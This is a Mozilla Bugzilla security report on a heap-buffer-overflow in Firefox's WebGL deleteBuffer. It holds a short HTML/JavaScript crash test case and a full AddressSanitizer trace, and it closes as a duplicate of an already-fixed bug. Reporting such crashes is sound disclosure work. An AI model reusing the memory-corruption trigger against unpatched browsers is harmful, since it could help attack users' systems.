Closed Bug 923523 Opened 12 years ago Closed 12 years ago

heap-buffer-overflow in webgl deleteBuffer

Categories

(Core :: Graphics: CanvasWebGL, defect)

Product:
Core
Component:
Graphics: CanvasWebGL
Version:
27 Branch
Platform:
x86_64
Linux
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 922921

People

(Reporter: lifeasageek, Unassigned)

Details

(Whiteboard: [sg:dupe 922921])

User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.76 Safari/537.36 Steps to reproduce: The test case below causes the heap-buffer-overflow in webgl deleteBuffer. Seems this case is related to https://bugzilla.mozilla.org/show_bug.cgi?id=922921, because removing the line gl.enableVertexAttribArray(0) would give the similar crash stacks (global-buffer-overflow). --------------------------------- <html> <canvas id="canvas"> </canvas> <script> canvas = document.getElementById('canvas'); gl = canvas.getContext('webgl'); ext = gl.getExtension('OES_vertex_array_object'); state = {}; state.buffer = gl.createBuffer(); vao = ext.createVertexArrayOES(); ext.bindVertexArrayOES(vao); gl.enableVertexAttribArray(0); gl.deleteBuffer(state.buffer); </script> </html> Actual results: ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000282ab8 at pc 0x7fc8227d7d6c bp 0x7fff3f494f40 sp 0x7fff3f494f38 READ of size 8 at 0x604000282ab8 thread T0 #0 0x7fc8227d7d6b in mozilla::WebGLRefPtr<mozilla::WebGLVertexArray>::operator->() const content/canvas/src/WebGLObjectModel.h:210 #1 0x7fc825574219 in mozilla::dom::WebGLRenderingContextBinding::deleteBuffer(JSContext*, JS::Handle<JSObject*>, mozilla::WebGLContext*, JSJitMethodCallArgs const&) obj-firefox/dom/bindings/WebGLRenderingContextBinding.cpp:7160 #2 0x7fc8255338fa in mozilla::dom::WebGLRenderingContextBinding::genericMethod(JSContext*, unsigned int, JS::Value*) obj-firefox/dom/bindings/WebGLRenderingContextBinding.cpp:12152 #3 0x7fc827234caa in JSFunction::native() const js/src/jscntxtinlines.h:218 #4 0x7fc827222e47 in Interpret(JSContext*, js::RunState&) js/src/vm/Interpreter.cpp:2492 #5 0x7fc827214b81 in js::RunScript(JSContext*, js::RunState&) js/src/vm/Interpreter.cpp:419 #6 0x7fc827236f9b in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value const&, js::ExecuteType, js::AbstractFramePtr, JS::Value*) js/src/vm/Interpreter.cpp:603 #7 0x7fc8272372f6 in js::Execute(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value*) js/src/vm/Interpreter.cpp:639 #8 0x7fc82742c57d in JS::Evaluate(JSContext*, JS::Handle<JSObject*>, JS::CompileOptions, unsigned short const*, unsigned long, JS::Value*) js/src/jsapi.cpp:4870 #9 0x7fc822f9fbea in nsJSUtils::EvaluateString(JSContext*, nsAString_internal const&, JS::Handle<JSObject*>, JS::CompileOptions&, nsJSUtils::EvaluateOptions&, JS::Value*, void**) dom/base/nsJSUtils.cpp:280 #10 0x7fc822f8d78f in nsJSContext::EvaluateString(nsAString_internal const&, JS::Handle<JSObject*>, JS::CompileOptions&, bool, JS::Value*, void**) dom/base/nsJSEnvironment.cpp:995 #11 0x7fc8227258fc in nsScriptLoader::EvaluateScript(nsScriptLoadRequest*, nsString const&, void**) content/base/src/nsScriptLoader.cpp:1002 #12 0x7fc82272320c in nsScriptLoader::ProcessRequest(nsScriptLoadRequest*, void**) content/base/src/nsScriptLoader.cpp:869 #13 0x7fc8227225d9 in nsScriptLoader::ProcessScriptElement(nsIScriptElement*) content/base/src/nsScriptLoader.cpp:696 #14 0x7fc82271a5e9 in nsScriptElement::MaybeProcessScript() content/base/src/nsScriptElement.cpp:139 #15 0x7fc8234b6c90 in nsCOMPtr<nsIScriptElement>::operator->() const /dist/include/nsIScriptElement.h:220 #16 0x7fc8234b4757 in nsHtml5TreeOpExecutor::RunFlushLoop() parser/html/nsHtml5TreeOpExecutor.cpp:593 #17 0x7fc82342dcd8 in nsHtml5ExecutorFlusher::Run() parser/html/nsHtml5StreamParser.cpp:131 #18 0x7fc825872cc9 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:622 #19 0x7fc82579a321 in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:238 #20 0x7fc824513381 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:81 #21 0x7fc825991ff3 in MessageLoop::RunInternal() ipc/chromium/src/base/message_loop.cc:220 #22 0x7fc8242fa0cc in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:161 #23 0x7fc823cdf27e in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:269 #24 0x7fc82117c4b0 in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:3868 #25 0x7fc82117d405 in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:3936 #26 0x7fc82117e33b in XRE_main toolkit/xre/nsAppRunner.cpp:4138 #27 0x459c8d in do_main(int, char**, nsIFile*) browser/app/nsBrowserApp.cpp:275 #28 0x7fc83085976c in __libc_start_main buildd/eglibc-2.15/csu/libc-start.c:226 #29 0x45910c in _start ??:0 0x604000282ab8 is located 0 bytes to the right of 40-byte region [0x604000282a90,0x604000282ab8) allocated by thread T0 here: #0 0x446155 in __interceptor_malloc _asan_rtl_ #1 0x7fc82a9005c8 in moz_xmalloc memory/mozalloc/mozalloc.cpp:54 Shadow bytes around the buggy address: 0x0c0880048500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0880048510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0880048520: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0880048530: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0880048540: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c0880048550: fa fa 00 00 00 00 00[fa]fa fa 00 00 00 00 00 fa 0x0c0880048560: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa 0x0c0880048570: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa 0x0c0880048580: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c0880048590: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa 0x0c08800485a0: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 ASan internal: fe
Component: Untriaged → Canvas: WebGL
Product: Firefox → Core
Fixed by the patch on bug 922921.
Status: UNCONFIRMED → RESOLVED
Closed: 12 years ago
Resolution: --- → DUPLICATE
Group: core-security
Whiteboard: [sg:dupe 922921]
You need to log in before you can comment on or make changes to this bug.